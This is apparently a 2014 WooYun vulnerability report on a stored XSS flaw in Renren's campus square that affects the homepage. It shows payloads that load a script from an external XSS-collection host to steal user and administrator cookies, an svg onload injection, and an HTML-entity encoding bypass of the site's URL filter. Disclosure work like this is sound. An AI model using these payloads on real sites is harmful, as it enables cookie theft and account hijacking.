当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-083600

漏洞标题:人人网校园广场存在持久型xss漏洞影响首页还能打管理cookie

相关厂商:人人网

漏洞作者: g0odnight

提交时间:2014-11-17 16:59

修复时间:2015-01-01 17:00

公开时间:2015-01-01 17:00

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-17: 细节已通知厂商并且等待厂商处理中
2014-11-17: 厂商已经确认,细节仅向厂商公开
2014-11-27: 细节向核心白帽子及相关领域专家公开
2014-12-07: 细节向普通白帽子公开
2014-12-17: 细节向实习白帽子公开
2015-01-01: 细节向公众公开

简要描述:

话说前段时间给你们说过这个校园广场上的这个点有漏洞,你们去补了。然后我今天看了下,恩,粗看的确补了。但是感觉不对啊。详细看下面吧

详细说明:

通过人人app提交如下代码先来APP提交页面截图:

Screenshot_2014-11-17-16-28-50_meitu_5.jpg


看代码:

<script src=http://xss.name/CsWX0p></script>会被过滤成这样:<script src="alert(te)" <a="" href="http://rrurl.cn/myAuj6" target="_blank" title="http://xss.name/ceHQoI">http://rrurl.cn/myAuj6 </a> "></script>
原来压根不过滤。看着好像没问题,但是感觉哪里不对。先试下弹窗回头试试绕过url的过滤,用这个代码:<img src=1><svg/onload=prompt(1)>直接弹了。先看图。这是首页的,直接首页弹了,影响所有访问首页的用户,不需要点击帖子什么的。


屏幕快照 2014-11-17 下午4.28.04_meitu_1.jpg


就这样,弹了。
然后来试试url的绕过。人人技术员对上一次漏洞的处理方法是:首先把=号后面的标记出来,然后对有http://头的一段内容进行分割,提取出来扔到title标签里。技术员肯定觉得这样难以绕过,能绕过也会很费力。但是你忘了重新编码,src=支持多种编码哦~那就编码试试~

为了防止泄露个人隐私,这个链接只是举例我随机删了几个字符,望包涵。
<script src=http://XXX.XXX/CsWX0p></script>对这里的链接重新编码下~比如&#104;&116;&#112;&#58&#47;&#120;&#115;&#115;&#46;&#110;&#97&#101;&#47;&#67;&#115;&#87。然后提交~


屏幕快照 2014-11-17 下午4.11.26_meitu_2.jpg


成功了~然后看下cookie。收到一个用户cookie。然后来个管理员的

屏幕快照 2014-11-17 下午4.11.03_meitu_3.jpg


管理员的

屏幕快照 2014-11-17 下午4.34.57_meitu_4.jpg


就这样了。快去补吧

漏洞证明:

看代码:

<script src=http://xss.name/CsWX0p></script>会被过滤成这样:<script src="alert(te)" <a="" href="http://rrurl.cn/myAuj6" target="_blank" title="http://xss.name/ceHQoI">http://rrurl.cn/myAuj6 </a> "></script>
原来压根不过滤。看着好像没问题,但是感觉哪里不对。先试下弹窗回头试试绕过url的过滤,用这个代码:<img src=1><svg/onload=prompt(1)>直接弹了。先看图。这是首页的,直接首页弹了,影响所有访问首页的用户,不需要点击帖子什么的。


屏幕快照 2014-11-17 下午4.28.04_meitu_1.jpg


就这样,弹了。
然后来试试url的绕过。人人技术员对上一次漏洞的处理方法是:首先把=号后面的标记出来,然后对有http://头的一段内容进行分割,提取出来扔到title标签里。技术员肯定觉得这样难以绕过,能绕过也会很费力。但是你忘了重新编码,src=支持多种编码哦~那就编码试试~

为了防止泄露个人隐私,这个链接只是举例我随机删了几个字符,望包涵。
<script src=http://XXX.XXX/CsWX0p></script>对这里的链接重新编码下~比如&#104;&116;&#112;&#58&#47;&#120;&#115;&#115;&#46;&#110;&#97&#101;&#47;&#67;&#115;&#87。然后提交~


屏幕快照 2014-11-17 下午4.11.26_meitu_2.jpg


成功了~然后看下cookie。收到一个用户cookie。然后来个管理员的

屏幕快照 2014-11-17 下午4.11.03_meitu_3.jpg


管理员的

屏幕快照 2014-11-17 下午4.34.57_meitu_4.jpg

修复方案:

过滤策略加强,你们更专业~

版权声明:转载请注明来源 g0odnight@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-11-17 17:03

厂商回复:

前面有白帽子提过,重复了,还是谢谢。

最新状态:

暂无